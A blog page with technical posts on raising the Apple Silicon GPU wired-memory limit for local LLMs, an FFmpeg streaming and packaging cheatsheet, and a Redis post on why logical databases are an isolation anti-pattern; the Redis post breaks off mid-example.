Your Mac Does Not Have Hidden VRAM, But This Tweak Helps Local LLMs

There is a particular kind of modern disappointment that only happens on an Apple Silicon Mac. You have 16 GB of unified memory, your model file is “only” 11 GB on disk, LM Studio looks optimistic for a moment, and then the load fails like a Victorian gentleman fainting at the sight of a spreadsheet. The internet calls this “hidden VRAM”. That phrase is catchy, but it is also slightly nonsense. Your Mac does not have secret gamer VRAM tucked behind the wallpaper. What it has is a shared memory pool and a tunable guardrail for how much of that pool the GPU side of the system is allowed to wire down. Move the guardrail carefully and some local LLMs that previously refused to load will suddenly run. Move it carelessly and your machine turns into a very expensive beachball generator.

Apple Silicon chip with a glowing memory fence and model blocks pushing against it
This is not free VRAM. It is a movable fence inside a shared pool.

The practical knob is iogpu.wired_limit_mb. On this 16 GB Apple Silicon Mac, the value is still the factory default, the same one shown in the video:

$ sysctl iogpu.wired_limit_mb
iogpu.wired_limit_mb: 0

That 0 means “use the system default policy”, not “unlimited”. For people running local models, that distinction matters. The interesting bit is that the policy is often conservative enough that a model which should fit on paper does not fit in practice once GPU allocations, KV cache, context length, the window server, and ordinary macOS overhead all take their cut. The result is a very familiar sentence: failed to load model.

What This Setting Actually Changes

Apple’s architecture is the key to understanding why this works at all. Unlike a desktop PC with separate system RAM and discrete GPU VRAM, Apple Silicon uses one shared pool. Apple says it plainly:

“Apple GPUs have a unified memory model in which the CPU and the GPU share system memory.” – Apple Developer, Choosing a resource storage mode for Apple GPUs

That one sentence explains both the magic and the pain. The magic is that Apple laptops and minis can run surprisingly capable local models without a discrete GPU at all. The pain is that every byte you hand to GPU-backed inference is a byte you are not handing to the rest of the operating system. This is capacity planning, not sorcery. Kleppmann would recognise it instantly from Designing Data-Intensive Applications: one finite resource, several hungry consumers, and trouble whenever you pretend the budget is not real.

The lower-level Metal API exposes the same idea in more formal language. The property recommendedMaxWorkingSetSize is defined by Apple as:

“An approximation of how much memory, in bytes, this GPU device can allocate without affecting its runtime performance.” – Apple Developer, MTLDevice.recommendedMaxWorkingSetSize

Notice the wording: without affecting runtime performance. Apple is not promising a hard technical ceiling. It is describing a safety line. The iogpu.wired_limit_mb trick is, in effect, you saying: “thank you for the safety line, I would like to move it because I know what else is running on this machine”.

If you want to see the same concept from code rather than from a slider in LM Studio, a tiny Metal program can query the recommended budget directly:

import Metal

if let device = MTLCreateSystemDefaultDevice() {
    let bytes = device.recommendedMaxWorkingSetSize
    let gib = Double(bytes) / 1024.0 / 1024.0 / 1024.0
    print(String(format: "Recommended GPU working set: %.2f GiB", gib))
}

That value is the polite answer. iogpu.wired_limit_mb is how you become impolite, but hopefully still civilised.

Why Models Fail Before RAM Looks Full

Most newcomers look at the model file size and do schoolboy arithmetic: “11 GB file, 16 GB machine, therefore fine.” That works right up until reality arrives with a clipboard. Runtime memory use includes the model weights, the KV cache, backend allocations, context-length overhead, app overhead, and the rest of macOS. LM Studio explicitly gives you a way to inspect this before you pull the pin:

“Preview memory requirements before loading a model using --estimate-only.” – LM Studio Docs, lms load

That is not a decorative feature. Use it. Also note LM Studio’s platform advice for macOS: 16 GB or more of RAM recommended, with 8 GB machines reserved for smaller models and modest contexts. The point is simple: local inference is not decided by model download size alone. It is decided by total live working set.

# Ask LM Studio for the memory estimate before loading
lms load --estimate-only openai/gpt-oss-20b

# Lower context if the estimate is close to the edge
lms load --estimate-only openai/gpt-oss-20b --context-length 4096

# If needed, reduce GPU usage rather than insisting on "max"
lms load openai/gpt-oss-20b --gpu 0.75 --context-length 4096

That last point is underappreciated. Sometimes the right answer is not “raise the wired limit”. Sometimes the right answer is “pick a saner context length” or “run a smaller quant”. Engineers love hidden toggles because they feel like boss fights. In practice, boring budgeting wins.
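Context length deserves its own arithmetic, because KV cache grows linearly with it. Here is a back-of-envelope sketch using the standard transformer KV-cache formula; the model geometry below (32 layers, 8 grouped-query KV heads, head dimension 128, fp16 cache) is an assumption in the style of an 8B-class model, not a measured value for any specific file:

```python
def kv_cache_gib(n_layers, n_kv_heads, head_dim, context_len, bytes_per_elem=2):
    """Rough KV-cache size: one K and one V tensor per layer, per token position."""
    total_bytes = 2 * n_layers * n_kv_heads * head_dim * context_len * bytes_per_elem
    return total_bytes / (1024 ** 3)

# Assumed 8B-class geometry: 32 layers, 8 KV heads (GQA), head_dim 128, fp16
for ctx in (4096, 8192, 32768):
    print(f"{ctx:>6} tokens -> {kv_cache_gib(32, 8, 128, ctx):.2f} GiB of KV cache")
```

Under these assumptions, going from 8k to 32k context costs roughly 3 GiB extra before a single new parameter is loaded, which is why trimming context often beats raising the wired limit.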

The Failure Modes Nobody Mentions in the Thumbnail

The YouTube version of this story is understandably upbeat: type command, load bigger model, cue triumphant tokens per second. The real world deserves a sterner briefing. Three failure cases show up over and over.

Case 1: The Model File Fits, But the Live Working Set Does Not

The trigger is a model whose weights fit comfortably on disk, but whose runtime footprint exceeds the combined budget once context and cache are included.

# Bad mental model:
# "The GGUF is 11 GB, so my 16 GB Mac can obviously run it."

model_weights_gb = 11.2
kv_cache_gb = 1.8
backend_overhead_gb = 0.8
desktop_overhead_gb = 2.0

total_live_working_set = (
    model_weights_gb +
    kv_cache_gb +
    backend_overhead_gb +
    desktop_overhead_gb
)

print(total_live_working_set)  # 15.8 GB, and we still have no safety margin

What happens next is either a clean refusal to load or a dirty scramble into memory pressure. The correct pattern is to estimate first, shrink context if necessary, and accept that a lower-bit quant is often the smarter answer than a higher limit.

# Better approach: estimate, then choose the model tier that fits
lms load --estimate-only qwen/qwen3-8b
lms load --estimate-only openai/gpt-oss-20b --context-length 4096

# If the estimate is borderline, step down a tier
lms load qwen/qwen3-8b --gpu max --context-length 8192

Case 2: You Raise the Limit So High That macOS Starts Fighting Back

This happens when you treat unified memory as if it were dedicated VRAM and leave the operating system too little breathing room. Headless Mac minis tolerate this better. A laptop with browsers, Finder, Spotlight, and a normal human life happening on it does not.

# Aggressive and often reckless on a 16 GB machine
sudo sysctl iogpu.wired_limit_mb=16000

# Then immediately try to load a borderline model
lms load openai/gpt-oss-20b --gpu max

The machine may still succeed, which is what makes this dangerous. Success under orange memory pressure is not proof of wisdom. It is proof that you got away with it once. The better pattern is to leave deliberate headroom for the OS and keep a close eye on Activity Monitor while you test.

# A more conservative example for a 16 GB Mac
sudo sysctl iogpu.wired_limit_mb=14336

# Verify the setting
sysctl iogpu.wired_limit_mb

# Then test with a realistic context length
lms load openai/gpt-oss-20b --context-length 4096

Case 3: You Optimise the Wrong Thing and Ignore Context Length

A surprisingly common mistake is to chase the biggest possible model whilst leaving an unnecessarily large context window enabled. KV cache is not free. A smaller context often buys you more stability than another dramatic sysctl ever will.

# Bad: max everything, then act surprised
lms load some-14b-model --gpu max --context-length 32768

# Better: fit the workload, not your ego
lms load some-14b-model --gpu max --context-length 4096
lms load some-8b-model  --gpu max --context-length 8192

This is the computing equivalent of bringing a grand piano to a pub quiz. Impressive, yes. Appropriate, no.

Memory pressure gauge rising as an oversized model pushes against system limits
The danger sign is not failure to load. It is successful loading with no oxygen left for the rest of the machine.

How to Tune It Without Turning Your Mac Into a Toaster

The safe way to use this setting is incremental, reversible, and boring. Those are good qualities in systems work. Start from default, raise in steps, test one model at a time, and watch memory pressure rather than vibes.

  1. Check the current value. If it is 0, you are on the system default policy.
  2. Pick a target that still leaves real headroom. On a 16 GB machine, 14 GB is already adventurous. On a dedicated headless box, you can be bolder.
  3. Restart the inference app. Tools like LM Studio need to re-detect the budget.
  4. Load with a realistic context length. Do not benchmark recklessness.
  5. Reset to default if the machine becomes unpleasant. A responsive Mac beats a heroic screenshot.

# 1. Inspect current policy
sysctl iogpu.wired_limit_mb

# 2. Raise cautiously
sudo sysctl iogpu.wired_limit_mb=12288

# 3. Test, observe, then step up if needed
sudo sysctl iogpu.wired_limit_mb=14336

# 4. Return to default policy
sudo sysctl iogpu.wired_limit_mb=0

If you truly need this on every boot, automate it like any other operational setting. Treat it as host configuration, not as a ritual you half-remember from a video. But also ask the adult question first: if you need a startup hack to run the model comfortably, should you really be running that model on this machine?
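If the answer is still yes, the sanctioned macOS mechanism for boot-time host configuration is a LaunchDaemon rather than a half-remembered alias. A minimal sketch, assuming a 14336 MB target; the label com.example.iogpu-wired-limit is invented, and the file would live in /Library/LaunchDaemons/ with root ownership:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
  "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <!-- Hypothetical label; pick your own reverse-DNS name -->
    <key>Label</key>
    <string>com.example.iogpu-wired-limit</string>
    <key>ProgramArguments</key>
    <array>
        <string>/usr/sbin/sysctl</string>
        <string>iogpu.wired_limit_mb=14336</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
```

Because it is a plain file, it is also trivially reversible: delete it, reboot, and you are back on the default policy.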

The second practical tool is estimation. Run the estimator before the load, not after the error:

# Compare two candidates before wasting time
lms load --estimate-only qwen/qwen3-8b
lms load --estimate-only mistral-small-3.1-24b --context-length 4096

# Use the estimate to choose the smaller model or context
lms load qwen/qwen3-8b --gpu max --context-length 8192

Which Models Actually Make Sense on Different Apple Silicon Macs

This is the section everybody really wants. Exact numbers depend on quant format, context length, backend behaviour, and what else the machine is doing. But the tiers below are realistic enough to save people from magical thinking.

| Mac memory tier | Comfortable local LLM tier | Possible with tuning | Usually a bad idea |
|---|---|---|---|
| 16 GB | 3B to 8B models, 12B class with modest context | Some 14B to 20B quants if you raise the limit and stay disciplined | Large-context 20B+, 30B-class models during normal desktop use |
| 24 GB | 8B to 14B models, many 20B-class quants | Some 24B to 32B models with sensible context | Treating it like a 64 GB workstation |
| 32 GB to 48 GB | 14B to 32B models comfortably, larger contexts for practical work | Some 70B quants on the upper end, especially on dedicated machines | Huge models plus giant context plus desktop multitasking |
| 64 GB and above | 30B to 70B-class quants become genuinely usable | Aggressive large-model experimentation on headless or dedicated Macs | Assuming every app uses memory exactly the same way |

If you want a one-line rule of thumb, it is this: on a 16 GB machine, think “excellent 7B to 8B box, adventurous 14B box, occasional 20B parlour trick”. On a 24 GB or 32 GB machine, the world gets much nicer. On a 64 GB+ Mac Studio, the conversation changes from “can I load this?” to “is the speed good enough for the inconvenience?”
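That rule of thumb can be written down as a lookup, which is handy in a provisioning script. The thresholds below simply encode the tiers from the sizing table; they are heuristics, not measurements:

```python
def suggested_model_tier(unified_memory_gb: int) -> str:
    """Heuristic tier mapping for Apple Silicon unified memory (from the table above)."""
    if unified_memory_gb >= 64:
        return "30B-70B-class quants genuinely usable"
    if unified_memory_gb >= 32:
        return "14B-32B comfortably, larger contexts for real work"
    if unified_memory_gb >= 24:
        return "8B-14B, many 20B-class quants"
    return "3B-8B sweet spot, 14B if disciplined, 20B as a parlour trick"

print(suggested_model_tier(16))
```

Treat the output as a starting point for estimation, not a guarantee; quant format and context length can move a machine up or down a tier.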

Also remember that smaller, better-tuned models often beat larger awkward ones for day-to-day coding, search, summarisation, and chat. A responsive 8B or 14B model you actually use is more valuable than a 20B model that only runs when the stars align and Chrome is closed.

# Practical workflow: compare candidates before downloading your dignity away
lms load --estimate-only qwen/qwen3-4b
lms load --estimate-only qwen/qwen3-8b
lms load --estimate-only openai/gpt-oss-20b --context-length 4096

Tiered Apple Silicon model sizing chart with memory classes and LLM blocks
The machine class matters more than the myth. Fit the model tier to the memory tier.

When the Default Setting Is Actually Fine

The balanced answer is that the default exists for good reasons. If your Mac is a general-purpose laptop, if you care about battery life and responsiveness, if you run multiple heavy apps at once, or if your local LLM work is mostly 7B to 8B models, leave the setting alone. The system default is often the correct trade-off.

This is also true if your workload is bursty rather than continuous. For occasional summarisation, coding assistance, or local RAG over documents, it is usually better to pick a slightly smaller model and preserve the machine’s overall behaviour. The hidden cost of “bigger model at any price” is that you stop trusting the computer. Once a laptop feels brittle, you use it less. That is bad engineering and worse ergonomics.

There is another subtle point. The wired-limit trick helps most when the machine is effectively dedicated to inference: a headless Mac mini, a quiet box on the shelf, a Mac Studio cluster, or a desktop session where you are willing to treat inference as the primary job. The closer your Mac is to a single-purpose appliance, the more sense this tweak makes.

What To Check Right Now

  • Check the current policy: run sysctl iogpu.wired_limit_mb and confirm whether you are on the default setting.
  • Estimate before loading: use lms load --estimate-only so you know the model’s live working set before you commit.
  • Audit context length: if you are using 16k or 32k context by habit, ask whether 4k or 8k would do the same job.
  • Watch memory pressure, not just free RAM: Activity Monitor tells you more truth than a single headline number.
  • Leave deliberate headroom: a model that barely runs is not a production setup, it is a stunt.
  • Reset when testing is over: sudo sysctl iogpu.wired_limit_mb=0 is a perfectly respectable ending.

Minimal dark checklist for Apple Silicon LLM tuning with commands and safety guardrails
Most wins come from estimation, context discipline, and realistic model choice, not from one dramatic command.

The honest headline, then, is better than the clickbait one. Your Mac does not have hidden VRAM waiting to be unlocked like a cheat code in a 1998 driving game. What it has is unified memory, a conservative GPU working-set policy, and enough flexibility that informed users can rebalance the machine for local inference. That is genuinely useful. It is also exactly the sort of useful that punishes people who confuse “possible” with “free”.

Video Attribution

This article was inspired by Alex Ziskind’s video on adjusting the GPU wired-memory limit for local LLM use on Apple Silicon Macs. The video is worth watching for the quick demonstration, particularly if you want to see the behaviour in LM Studio before you touch your own machine.

Original video: Your Mac Has Hidden VRAM… Here’s How to Unlock It by Alex Ziskind.

nJoy 😉

FFmpeg Cheatsheet 2026: Modern Streaming, Packaging, and Command-Line Sorcery

FFmpeg is what happens when a Swiss Army knife gets a PhD in multimedia and then refuses to use a GUI. It can inspect, trim, remux, transcode, filter, normalise, package, stream, and automate media pipelines with almost rude efficiency. The catch is that it speaks in a grammar that is perfectly logical and completely uninterested in your vibes. Put one option in the wrong place and FFmpeg will not “figure it out”. It will hand you a lesson in command-line causality.

This version is built to be kept open in a tab: a smarter cheatsheet, a modern streaming reference, a compact guide to the commands worth memorising, and a curated collection of official docs plus a few YouTube resources that are actually worth your time. We will cover the fast path, the dangerous path, and the production path.

Dark technical visualisation of FFmpeg processing audio and video streams
FFmpeg in one picture: streams go in, decisions get made, codecs either behave or get replaced.

First Principles: How FFmpeg Actually Thinks

Most FFmpeg confusion begins with the wrong mental model. Humans think in files. FFmpeg thinks in inputs, streams, codecs, filters, mappings, and outputs. A single file can contain several streams: video, multiple audio tracks, subtitles, chapters, timed metadata. FFmpeg lets you inspect that structure, choose what to keep, decode only what needs changing, then write a new container deliberately.

The core trio is simple. ffmpeg transforms media. ffprobe tells you what is actually in the file. ffplay previews quickly. The smartest FFmpeg habit is also the least glamorous: ffprobe first, ffmpeg second. Guessing stream layout is how people end up with silent video, the wrong commentary track, or subtitles that evaporate on contact with MP4.

“As a general rule, options are applied to the next specified file. Therefore, order is important, and you can have the same option on the command line multiple times.” – FFmpeg Documentation, ffmpeg manual

That rule explains most self-inflicted FFmpeg pain. Input options belong before the input they affect. Output options belong before the output they affect. You are not writing prose. You are wiring a pipeline.

ffmpeg [global-options] \
  [input-options] -i input1 \
  [input-options] -i input2 \
  [filter-and-map-options] \
  [output-options] output.ext

The other distinction worth burning into memory is container versus codec. MP4, MKV, MOV, WebM, TS, and M4A are containers. H.264, HEVC, AV1, AAC, Opus, MP3, ProRes, and DNxHR are codecs. Containers are boxes. Codecs are how the contents were compressed. A huge fraction of “FFmpeg is broken” reports are really “I changed the box and forgot the contents still have rules”.

Dark diagram showing FFmpeg command flow from input to streams to filters to output
The command-flow model: inspect streams, decide what gets copied, decide what gets filtered, then write the output on purpose.

The Fast Lane: Steal These Commands First

If you only memorise a dozen FFmpeg moves, make them these. They cover the majority of real-world jobs: inspect, copy, trim, transcode, subtitle, extract, package, and deliver.

| Job | Command | Use it when |
|---|---|---|
| Inspect a file properly | ffprobe -hide_banner input.mkv | You want the truth about streams before touching anything. |
| Get scriptable metadata | ffprobe -v error -show_streams -show_format -of json input.mp4 | Automation, CI, or conditional workflows. |
| Remux without quality loss | ffmpeg -i input.mkv -c copy output.mp4 | The streams are already compatible, you just need a different container. |
| Trim quickly | ffmpeg -ss 00:01:30 -i input.mp4 -t 20 -c copy clip.mp4 | Speed matters more than perfect frame accuracy. |
| Trim accurately | ffmpeg -i input.mp4 -ss 00:01:30 -t 20 -c:v libx264 -crf 18 -c:a aac clip.mp4 | Tutorial clips, ad boundaries, subtitle-sensitive edits. |
| Good default MP4 for the web | ffmpeg -i input.mov -c:v libx264 -preset slow -crf 20 -c:a aac -b:a 192k -movflags +faststart output.mp4 | You need a boring, reliable, browser-friendly output. Boring is a compliment here. |
| Resize while keeping aspect ratio | ffmpeg -i input.mp4 -vf "scale=1280:-2" -c:v libx264 -crf 20 -c:a aac output.mp4 | Social uploads, previews, smaller delivery files. |
| Extract audio | ffmpeg -i input.mp4 -vn -c:a copy audio.m4a | The source audio codec already fits the target container. |
| Normalise speech | ffmpeg -i input.wav -af "loudnorm=I=-16:TP=-1.5:LRA=11" output.wav | Podcasts, tutorials, voice-overs, screen recordings. |
| Burn subtitles in | ffmpeg -i input.mp4 -vf "subtitles=subs.srt" -c:v libx264 -crf 18 -c:a copy output.mp4 | You need one universal file and do not trust player subtitle support. |
| Contact sheet | ffmpeg -i input.mp4 -vf "fps=1/10,scale=320:-1,tile=4x4" -frames:v 1 sheet.png | Fast content review without watching the whole thing. |
| Concatenate matching files | ffmpeg -f concat -safe 0 -i files.txt -c copy merged.mp4 | Inputs share compatible codecs and parameters. |
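The -of json flag in the second row is what turns ffprobe from a viewer into an API. A minimal sketch of a pre-flight check before remuxing to MP4; the JSON here is a canned sample shaped like real -show_streams output rather than a live ffprobe call, and the codec whitelist is deliberately simplified:

```python
import json

# Canned sample shaped like: ffprobe -v error -show_streams -of json input.mkv
sample = json.loads("""
{"streams": [
  {"index": 0, "codec_type": "video", "codec_name": "h264"},
  {"index": 1, "codec_type": "audio", "codec_name": "aac"},
  {"index": 2, "codec_type": "subtitle", "codec_name": "subrip"}
]}
""")

# Simplified, illustrative whitelist of codecs that remux cleanly into MP4
MP4_SAFE = {"h264", "hevc", "av1", "aac", "mp3"}

for s in sample["streams"]:
    verdict = "copy" if s["codec_name"] in MP4_SAFE else "convert or drop"
    print(f'stream {s["index"]} ({s["codec_type"]}/{s["codec_name"]}): {verdict}')
# stream 0 (video/h264): copy
# stream 1 (audio/aac): copy
# stream 2 (subtitle/subrip): convert or drop
```

That last line is exactly the SRT-in-MP4 trap: the subtitle stream needs converting (FFmpeg's mov_text codec handles this for MP4), not copying.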

“Streamcopy is useful for changing the elementary stream count, container format, or modifying container-level metadata. Since there is no decoding or encoding, it is very fast and there is no quality loss.” – FFmpeg Documentation, ffmpeg manual

If you remember one performance trick, remember -c copy. It is the difference between “done in a second” and “let me hear all your laptop fans introduce themselves”.

Modern FFmpeg: Streaming, Packaging, and Delivery in 2026

This is where a lot of older FFmpeg write-ups feel dusty. Modern usage is not just “convert AVI to MP4”. It is packaging for adaptive streaming, feeding live ingest pipelines, generating web-safe delivery files, and choosing the correct transport for the job instead of shouting at RTMP because it was popular in 2014.

“Apple HTTP Live Streaming muxer that segments MPEG-TS according to the HTTP Live Streaming (HLS) specification.” – FFmpeg Formats Documentation, HLS muxer

“WebRTC (Real-Time Communication) muxer that supports sub-second latency streaming according to the WHIP (WebRTC-HTTP ingestion protocol) specification.” – FFmpeg Formats Documentation, WHIP muxer

That is the modern landscape in miniature. FFmpeg is not only a transcoder. It is a packaging and transport tool. Use the right mode for the latency, compatibility, and scale you actually need.

| Goal | Best fit | Starter command |
|---|---|---|
| Simple browser playback | MP4 with H.264/AAC | ffmpeg -i in.mov -c:v libx264 -crf 20 -c:a aac -movflags +faststart out.mp4 |
| Adaptive VOD streaming | HLS or DASH | ffmpeg -i in.mp4 -c:v libx264 -c:a aac -hls_time 6 -hls_playlist_type vod stream.m3u8 |
| Traditional live platform ingest | RTMP | ffmpeg -re -i in.mp4 -c:v libx264 -c:a aac -f flv rtmp://server/app/key |
| More robust live transport over messy networks | SRT | ffmpeg -re -i in.mp4 -c:v libx264 -c:a aac -f mpegts "srt://host:port?mode=caller&latency=2000000" |
| Sub-second browser ingest | WHIP / WebRTC | ffmpeg -re -i in.mp4 -c:v libx264 -c:a opus -f whip "http://whip-endpoint.example/whip" |

Here are the practical streaming recipes worth saving.

HLS VOD

ffmpeg -i input.mp4 \
  -c:v libx264 -preset medium -crf 22 \
  -c:a aac -b:a 128k \
  -hls_time 6 \
  -hls_playlist_type vod \
  -hls_segment_filename "seg-%03d.ts" \
  stream.m3u8

DASH Packaging

ffmpeg -i input.mp4 \
  -c:v libx264 -preset medium -crf 22 \
  -c:a aac -b:a 128k \
  -f dash \
  manifest.mpd

RTMP Ingest

ffmpeg -re -i input.mp4 \
  -c:v libx264 -preset veryfast -b:v 4500k -maxrate 4500k -bufsize 9000k \
  -c:a aac -b:a 160k \
  -f flv rtmp://server/app/stream-key

SRT Ingest

ffmpeg -re -i input.mp4 \
  -c:v libx264 -preset veryfast -b:v 4500k \
  -c:a aac -b:a 160k \
  -f mpegts "srt://example.com:9000?mode=caller&latency=2000000"

That latency value is in microseconds, which is the kind of small detail that turns a calm afternoon into a surprisingly educational one.
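Because that unit mismatch is such a classic, a one-line guard in any wrapper script is cheap insurance. The helper name and hosts below are invented for illustration; only the latency-in-microseconds convention comes from FFmpeg's srt protocol options:

```python
def srt_url(host: str, port: int, latency_ms: int) -> str:
    """Build an SRT caller URL, converting latency from the ms humans think in
    to the microseconds FFmpeg's srt protocol expects."""
    return f"srt://{host}:{port}?mode=caller&latency={latency_ms * 1000}"

print(srt_url("example.com", 9000, 2000))
# srt://example.com:9000?mode=caller&latency=2000000
```

Two seconds of latency budget, expressed once in milliseconds, and the conversion mistake is gone for good.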

WHIP / WebRTC Ingest

ffmpeg -re -i input.mp4 \
  -c:v libx264 -preset veryfast \
  -c:a opus -b:a 128k \
  -f whip "https://whip.example.com/rtc/v1/whip/?app=live&stream=demo"

WHIP is interesting because it reflects the current internet, not the old one. If your target is low-latency browser delivery, WHIP and WebRTC are now part of the real conversation, not just interesting acronyms for protocol collectors.

Dark streaming pipeline diagram showing input transcoding into HLS segments and playlist
Modern FFmpeg is packaging plus transport plus compatibility engineering, not just transcoding.

Hardware Acceleration Without Lying to Yourself

Modern FFmpeg usage also means knowing when to use hardware encoders. They are fantastic when throughput matters: live streaming, batch transcoding, preview generation, cloud pipelines, and “I have 800 files and would prefer not to age visibly today”. They are not always the best answer for maximum compression efficiency or highest archival quality.

The practical rule is simple. If you need the best quality-per-bit, software encoders like libx264, libx265, and libaom-av1 still matter. If you need speed and acceptable quality, hardware encoders are often the right move.

| Platform | Common encoder | Example |
|---|---|---|
| NVIDIA | h264_nvenc, hevc_nvenc, sometimes AV1 on newer cards | ffmpeg -i in.mp4 -c:v h264_nvenc -b:v 6M -c:a aac out.mp4 |
| Intel / AMD on Linux | h264_vaapi, hevc_vaapi | ffmpeg -hwaccel vaapi -hwaccel_output_format vaapi -i in.mp4 -c:v h264_vaapi -b:v 6M out.mp4 |
| macOS | h264_videotoolbox, hevc_videotoolbox | ffmpeg -i in.mp4 -c:v h264_videotoolbox -b:v 6M -c:a aac out.mp4 |

The mistake people make is assuming hardware encode means “same quality, just faster”. Often it means “faster, different tuning, sometimes larger bitrate for comparable quality”. Be honest about the trade-off. This is not a moral issue. It is an engineering one.

Failure Cases That Keep Reappearing

Hunt and Thomas argue in The Pragmatic Programmer that good tools reward understanding over superstition. FFmpeg is one of the clearest examples of that principle on the command line. Here are the mistakes that keep burning people because they look plausible until you understand what FFmpeg is actually doing.

Case 1: You Wanted Speed, but Also Expected Frame Accuracy

Putting -ss before -i is fast. It is often not frame-accurate. That is a feature, not a betrayal.

# Fast, usually keyframe-aligned
ffmpeg -ss 00:10:00 -i input.mp4 -t 15 -c copy clip.mp4

If you need surgical cuts, decode and re-encode.

ffmpeg -i input.mp4 -ss 00:10:00 -t 15 \
  -c:v libx264 -crf 18 -c:a aac \
  clip-accurate.mp4

Case 2: You Asked for a Filter and Also Asked Not to Decode Anything

Filters need decoded frames. Stream copy avoids decoding. These are incompatible desires, not a creative workflow.

# Contradiction in command form
ffmpeg -i input.mp4 -vf "scale=1280:-2" -c copy output.mp4

The corrected pattern is to re-encode video and copy audio if it stays untouched.

ffmpeg -i input.mp4 -vf "scale=1280:-2" \
  -c:v libx264 -crf 20 \
  -c:a copy \
  output.mp4

Case 3: FFmpeg Picked the Wrong Streams Because You Left It to Fate

Auto-selection works until the source has multiple languages, commentary, descriptive audio, or subtitles. At that point, the polite thing to do is map explicitly.

# Ambiguous and sometimes unlucky
ffmpeg -i movie.mkv -c copy output.mp4
ffprobe -hide_banner movie.mkv

ffmpeg -i movie.mkv \
  -map 0:v:0 \
  -map 0:a:0 \
  -map 0:s:0? \
  -c:v copy -c:a copy -c:s mov_text \
  output.mp4

Case 4: Your Filtergraph Became Punctuation Soup

Once you move into -filter_complex, labels stop being optional niceties. They become the difference between clarity and a future headache.

# Hard to reason about, and subtly wrong: -map 0:v grabs the unfiltered video
ffmpeg -i main.mp4 -i logo.png -i music.wav \
  -filter_complex "[0:v][1:v]overlay=20:20,scale=1280:-2;[2:a]volume=0.25[a]" \
  -map 0:v -map "[a]" output.mp4

Break the graph into named stages.

ffmpeg -i main.mp4 -i logo.png -i music.wav \
  -filter_complex "\
    [0:v][1:v]overlay=20:20[branded]; \
    [branded]scale=1280:-2[vout]; \
    [2:a]volume=0.25[aout]" \
  -map "[vout]" -map "[aout]" \
  -c:v libx264 -crf 20 -c:a aac \
  output.mp4

Dark diagram of FFmpeg filtergraph with labelled nodes and branches
Filtergraphs stop being scary the moment you read them as labelled dataflow instead of punctuation.

The Best Collection to Bookmark

If you want the strongest FFmpeg learning stack from basic to advanced, use this order. Not because it is trendy, but because it respects how people actually learn complicated tools: truth first, intuition second, repetition third.

  1. FFmpeg documentation portal – the source of truth for manuals, components, and the official reference tree.
  2. ffmpeg manual – command order, stream copy, mapping, options, and the grammar of the tool.
  3. ffprobe documentation – essential if your work is even slightly automated.
  4. FFmpeg filters documentation – the real reference once you graduate from single-flag edits.
  5. FFmpeg formats documentation – where modern packaging, HLS, DASH, and WHIP start becoming concrete.
  6. FFmpeg protocols documentation – required reading once live ingest and transport enter the picture.
  7. STREAM MAPPING with FFMPEG – Everything You Need to Know – one of the best targeted explainers on a concept that causes disproportionate pain.
  8. FFMPEG & Filter Complex: A Visual Guide to the Filtergraph Usage – useful once the commands stop being linear.
  9. FFmpeg FILTERS: How to Use Them to Manipulate Your Videos – a solid bridge from basic edits to compositional thinking.
  10. Video and Audio Processing in FFMPEG – useful if you learn best by revisiting the topic from multiple angles.

The rule is simple: use YouTube for intuition, use the official docs for truth. The people who confuse those two categories usually end up with very confident commands and very confusing output.

What to Check Right Now

  • Adopt one boring, reliable web delivery recipe – H.264, AAC, and -movflags +faststart will solve more problems than exotic cleverness.
  • Use ffprobe before every important transcode – that one habit prevents a ridiculous amount of avoidable breakage.
  • Reach for -c copy first when no transformation is needed – it is faster and lossless, which is suspiciously close to magic.
  • Move from RTMP-only thinking to transport-aware thinking – HLS for compatibility, DASH for adaptive packaging, SRT for rougher networks, WHIP for low-latency browser workflows.
  • Pick hardware encoders when throughput matters and software encoders when efficiency matters – this is the real trade-off, not ideology.
  • Build a private snippets file – five good FFmpeg recipes will do more for your sanity than fifty vague memories.

FFmpeg rewards the same engineering habit that every serious tool rewards: inspect first, be explicit, automate the boring parts, and choose the transport and packaging that fit the real system in front of you. Do that and FFmpeg stops feeling like cryptic wizardry and starts feeling like infrastructure. Which is exactly what it is.

nJoy 😉

Redis Databases: The Anti-Pattern That Haunts Production

Redis is one of those tools you adopt on a Monday and depend on completely by Thursday. It’s fast, it’s simple, and its data structures make your brain feel big. But buried inside Redis is a feature that has been silently causing production incidents for years: multiple logical databases within a single instance. You’ve probably used it. You might be using it right now. And there’s a very good chance it’s going to bite you at the worst possible moment.

Dark visualization of Redis databases sharing a single server process with interference between them
Multiple Redis databases: they look separate, but they live in the same house and share everything

What Redis Databases Actually Are

Redis ships with 16 databases numbered 0 through 15. You switch between them using the SELECT command. Each database has its own keyspace, which means keys named user:1 in database 0 are completely separate from user:1 in database 5. On the surface this looks like proper isolation. It is not.

The Redis documentation itself is blunt about this. From the official docs on SELECT:

“Redis databases should not be used as a way to separate different application data. The proper way to do this is to use separate Redis instances.” — Redis documentation, SELECT command

This isn’t buried in a footnote. It’s right there in the command reference. And yet, multiple databases are everywhere in production. Why? Because they’re convenient. Running one Redis process is simpler than running three. And the keyspace separation looks exactly like the isolation you actually need.

# This looks clean and organised
redis-cli -n 0   # application sessions
redis-cli -n 5   # background pipeline processing
redis-cli -n 10  # lightweight caching

# What you think you have: three isolated stores
# What you actually have: three buckets in one leaking tank

The Shared Resource Problem: What Actually Goes Wrong

Every Redis database within a single instance shares the same server process. That means one pool of memory, one CPU thread (Redis is single-threaded for commands), one network socket, one set of configuration limits. When you SELECT a different database number, you’re not switching to a different process. You’re just telling Redis to look in a different keyspace. The underlying machinery is identical.

Kleppmann in Designing Data-Intensive Applications explains why this matters at a systems level: shared resources without isolation boundaries mean a fault in one subsystem propagates to all others. He’s talking about distributed systems broadly, but the principle applies here with brutal precision. Your databases are not subsystems. They are namespaces sharing a single subsystem.

Here is what that looks like in practice.

Case 1: Memory Eviction Wipes Your Cache

You configure a single Redis instance with maxmemory 4gb and maxmemory-policy allkeys-lru. You use database 5 for pipeline job queues and database 10 for caching API responses. Your pipeline goes through a burst period and starts writing thousands of large job payloads into database 5.

# redis.conf
maxmemory 4gb
maxmemory-policy allkeys-lru

# Your pipeline flooding database 5
import redis
r = redis.Redis(db=5)
for job in burst_of_10k_jobs:
    r.set(f"job:{job.id}", job.payload, ex=3600)  # big payloads

# Meanwhile in your web app...
cache = redis.Redis(db=10)
